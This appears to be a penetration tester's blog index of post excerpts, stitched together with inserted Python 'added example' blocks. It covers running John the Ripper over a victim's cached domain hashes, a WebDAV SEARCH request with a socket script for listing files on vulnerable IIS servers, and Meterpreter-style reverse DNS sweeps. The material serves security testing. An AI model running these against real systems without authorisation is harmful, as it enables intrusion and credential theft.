John the Ripper only takes one wordlist at a time. There are plenty of docs out there that show you how to cat all of your dictionaries into John's stdin, but I like to run rules against my lists and I didn't see any how-tos on doing this. Here is my way:

ls dicts | xargs -t -I file ./john --pot=victim.pot --format=mscash --wordlist=dicts/file --rules victim_cachedump.txt

This command lists the 'dicts' directory and pipes the names to xargs, which prints the command it runs for each iteration (-t) and replaces every occurrence of the word 'file' with the name from the current line (-I). Because every run shares the same pot file, hashes cracked by an earlier wordlist are not retried by the later ones.
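The same loop as a small Python wrapper (an added example, not the author's one-liner): one john invocation per wordlist, arguments passed as a list rather than through a shell, and a dry-run mode that only echoes the commands the way xargs -t does. The binary path, pot name, format and hash file names are the ones used above and are assumptions for your setup.

```python
import shlex
import subprocess
from pathlib import Path


def john_commands(dict_dir, hash_file, pot="victim.pot", fmt="mscash", john="./john"):
    """One john command line per wordlist in dict_dir.

    Only regular files are used (sub-directories are skipped) and the list is
    sorted so repeated runs process the dictionaries in the same order. Each
    command is a list of arguments, so a wordlist name containing spaces or
    shell metacharacters is passed through untouched.
    """
    cmds = []
    for wordlist in sorted(Path(dict_dir).iterdir()):
        if not wordlist.is_file():
            continue
        cmds.append([
            john,
            f"--pot={pot}",        # shared pot: already-cracked hashes are skipped on later lists
            f"--format={fmt}",
            f"--wordlist={wordlist}",
            "--rules",             # default wordlist rules, exactly as in the xargs one-liner
            str(hash_file),
        ])
    return cmds


def run_rules_over_dicts(dict_dir, hash_file, dry_run=False, **john_opts):
    """Run john once per wordlist, echoing each command line like `xargs -t`.

    Returns the list of commands so the caller can inspect what was (or would
    have been) run. dry_run=True only prints them, which is also what the
    self-test below relies on.
    """
    cmds = john_commands(dict_dir, hash_file, **john_opts)
    for cmd in cmds:
        print(" ".join(shlex.quote(arg) for arg in cmd))
        if not dry_run:
            # No shell=True: the argument list is handed to john verbatim.
            subprocess.run(cmd, check=True)
    return cmds


if __name__ == "__main__":
    import sys
    # usage: python john_each.py dicts victim_cachedump.txt [--dry-run]
    dict_dir, hash_file = sys.argv[1:3]
    run_rules_over_dicts(dict_dir, hash_file, dry_run="--dry-run" in sys.argv[3:])
```

After the loop finishes, `./john --pot=victim.pot --format=mscash --show victim_cachedump.txt` prints everything cracked across all the lists, since they all wrote to the same pot.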
I've had a private list of commands that I run on Windows or Linux when I pop a shell, as I'm sure most pentesters do. It isn't so much hoarding as it is jumbled notes that are 'not worth posting'. Well, I made two (now 3) public Google Docs (anyone can edit, *don't be a dick* clause):

Linux/Unix/BSD Post Exploitation: https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit?hl=en_US

Windows Post Exploitation: https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US
I am way late to the game on this, but if you have a blog, a Twitter handle, or even better (in this specific case) a CISSP, please support Wim Remes (@wimremes), who has submitted to become a member of the (ISC)2 Board of Directors. On Twitter use the hashtag #wim4board. Let's help the certifications, especially the one with so much corporate/government acceptance, get better. His petition: http://blog.remes-it.be/petition.html Other supporters:
This: http://www.securityfocus.com/bid/1756 still works (on vulnerable hosts; this is an old vuln) and is very useful. Send this:

SEARCH / HTTP/1.1
Host: target
Content-Type: text/xml
Content-Length: 133

<?xml version="1.0"?>
<g:searchrequest xmlns:g="DAV:">
<g:sql>
Select "DAV:displayname" from scope()
</g:sql>
</g:searchrequest>

(133 is the length of that body with CRLF line endings and no trailing newline; if you change the body, recompute it or the server will wait for bytes that never arrive.) And expect something like this back:
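An added example (not from the original post) that sends the SEARCH request above over a raw socket so the verb and headers go out exactly as written, computes Content-Length from the body instead of hard-coding it, and pulls every DAV:displayname out of the 207 Multi-Status reply. The reply shape follows the standard WebDAV multistatus format; the sample response embedded for the self-test is constructed, not captured from a real IIS host.

```python
import socket
import xml.etree.ElementTree as ET

# The body from the post: CRLF-terminated lines, no trailing newline.
# That is exactly what makes its Content-Length come out to 133.
SEARCH_BODY = b"\r\n".join([
    b'<?xml version="1.0"?>',
    b'<g:searchrequest xmlns:g="DAV:">',
    b'<g:sql>',
    b'Select "DAV:displayname" from scope()',
    b'</g:sql>',
    b'</g:searchrequest>',
])


def build_search_request(host, path="/", body=SEARCH_BODY):
    """Assemble the raw SEARCH request; Content-Length is derived from the body."""
    headers = [
        f"SEARCH {path} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: text/xml",
        f"Content-Length: {len(body)}",
        "Connection: close",   # lets us read until EOF instead of parsing keep-alive framing
    ]
    return "\r\n".join(headers).encode() + b"\r\n\r\n" + body


def dechunk(body):
    """Decode an HTTP/1.1 chunked body (size line in hex, data, CRLF, ..., 0)."""
    out = bytearray()
    pos = 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            break
        size = int(body[pos:end].split(b";")[0], 16)   # ignore chunk extensions
        if size == 0:
            break
        out += body[end + 2:end + 2 + size]
        pos = end + 2 + size + 2                        # skip data and its trailing CRLF
    return bytes(out)


def send_search(host, port=80, path="/", timeout=10):
    """Send the request and return (status_line, decoded_body_bytes)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_search_request(host, path))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    head, _, body = b"".join(chunks).partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0].decode(errors="replace")
    if b"transfer-encoding: chunked" in head.lower():
        body = dechunk(body)
    return status_line, body


def extract_displaynames(multistatus_xml):
    """Return every DAV:displayname in a Multi-Status body, in document order."""
    root = ET.fromstring(multistatus_xml)
    return [el.text or "" for el in root.iter("{DAV:}displayname")]


# Constructed sample of a 207 Multi-Status body (RFC 4918 shape), for the self-test.
SAMPLE_RESPONSE = b"""<?xml version="1.0"?>
<a:multistatus xmlns:a="DAV:">
<a:response><a:href>http://target/scripts/</a:href><a:propstat><a:prop>
<a:displayname>scripts</a:displayname></a:prop><a:status>HTTP/1.1 200 OK</a:status>
</a:propstat></a:response>
<a:response><a:href>http://target/iisstart.asp</a:href><a:propstat><a:prop>
<a:displayname>iisstart.asp</a:displayname></a:prop><a:status>HTTP/1.1 200 OK</a:status>
</a:propstat></a:response>
</a:multistatus>"""


if __name__ == "__main__":
    import sys
    status, body = send_search(sys.argv[1])
    print(status)
    for name in extract_displaynames(body):
        print(name)
```

A 207 status with displaynames in the body confirms the WebDAV SEARCH handler is exposed; anything else (403, 404, 501) means the method is blocked or WebDAV is off, which is the fix for this one.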
Update 1: No, this doesn't need to be in memory since you control the system, but it was a fun challenge.

Update 2: The info for the 'adduser' payload says 'Create a new user and add them to local administration group'. I'm guessing that because I ran this on a DC I didn't notice this, but it is something to keep in mind when running this script.

Update 3: Here is a PowerShell way of doing things from a CSV; you can put some passwords in the CSV and keep it for reference too.
I saw a post back in June and it just recently came up again: http://www.securityartwork.es/2011/06/01/dns-port-forwarding-con-meterpreter/ It looked like a lot of hard work to set that up and I'm really lazy. I didn't want to go through all that every time I got onto a new network. So I made a very simple Meterpreter post module that just calls the Windows API function 'gethostbyaddr' using Railgun, so the reverse lookups are done by the compromised host against its own DNS servers. TL;DR: You can download the post module here: ipresolver.
One important thing to note about Railgun is that you are calling the API directly, and just as if you were writing C++, the function you are calling might not exist on the system you are calling it on. So here is a quick trick to find out whether the function (API) you want to call is available to you. For my example I'm using 'getaddrinfo', since its life in Windows is somewhat odd.
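An added example covering both of the points above (not the author's post module, and plain Python on the attacker side rather than Railgun inside a Meterpreter session): first, resolve an export by name and bail out cleanly if it is missing, which is what ctypes does through GetProcAddress/dlsym on attribute access and is the same check you would make natively before calling a function through Railgun; second, sweep a subnet with gethostbyaddr and keep only the addresses that have a PTR record. Loading ws2_32 on Windows and the process symbol table on POSIX is an assumption about where the resolver functions live; the 10.0.0.0/30 network and hostnames in the self-test are constructed.

```python
import ctypes
import ipaddress
import socket
import sys


def export_available(lib, name):
    """True if the loaded library exposes an export called `name`.

    ctypes resolves exports lazily: the first attribute access runs
    GetProcAddress (Windows) or dlsym (POSIX) and raises AttributeError when
    the symbol is absent, so this is a cheap existence check before any call.
    """
    try:
        getattr(lib, name)
        return True
    except AttributeError:
        return False


def load_resolver_library():
    """Where gethostbyaddr/getaddrinfo live: ws2_32.dll on Windows, libc on POSIX.

    On POSIX, CDLL(None) is dlopen(NULL), the global symbol table of the
    running process, which already includes libc.
    """
    if sys.platform == "win32":
        return ctypes.WinDLL("ws2_32")
    return ctypes.CDLL(None)


def reverse_sweep(network, resolver=socket.gethostbyaddr):
    """Reverse-resolve every host address in `network`.

    Returns {ip: hostname} for addresses that have a PTR record and silently
    skips the rest. `resolver` must behave like socket.gethostbyaddr (return a
    (name, aliases, addresses) tuple or raise OSError); it is injectable so the
    sweep logic can be exercised offline.
    """
    found = {}
    for ip in ipaddress.ip_network(network).hosts():
        try:
            name, _aliases, _addrs = resolver(str(ip))
        except OSError:       # socket.herror and socket.gaierror are OSError subclasses
            continue
        found[str(ip)] = name
    return found


if __name__ == "__main__":
    # usage: python ipresolve.py 10.0.0.0/24 [export_name]
    lib = load_resolver_library()
    wanted = sys.argv[2] if len(sys.argv) > 2 else "getaddrinfo"
    print(f"{wanted}: {'present' if export_available(lib, wanted) else 'MISSING'}")
    if not export_available(lib, "gethostbyaddr"):
        sys.exit("gethostbyaddr not available here, nothing to sweep with")
    for ip, name in reverse_sweep(sys.argv[1]).items():
        print(f"{ip}\t{name}")
```

When the check fails inside a Railgun call, the symptom is an error from the DLL loader rather than a Windows error code from the function, so doing the existence check up front keeps the module's output readable.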
Also known as "How to practice what we preach". I don't know how long I've been telling clients that they need a minimum password length of 15 characters so there is no chance an LM hash will be stored (with the bonus that the new password won't be close to their original). But I've never tried setting it myself. Well, a client called me out. You can't! (Well, at least not through the UI.)
This series was interrupted a bit by the new Metasploit HTTP/HTTPS payloads (more info). Definitely not complaining, though, as the new features (as will be discussed in part 2) are some epic additions to the payloads list. However, an important change happened while the craziness over the new payloads was going on: ScriptJunkie snuck in an awesome change to msfvenom (a.k.a. msffsm). Here is the link to the ticket about the change (link) and the revision (r13057).
I've been cracking passwords for a while and use a myriad of tools in a certain order to get the job done. I find that Cain is still my go-to for letting me visualize the process and do some basic sorting (I really wish I could search in-app). But I've been asking around on Twitter questions like "Why is GPU cracking for 50k hashes faster than rainbow tables?" (most say the bottleneck is the HDD read pattern and speed), and many asked what all of my complaints are, so I figured this would be the best place (rather than multiple emails)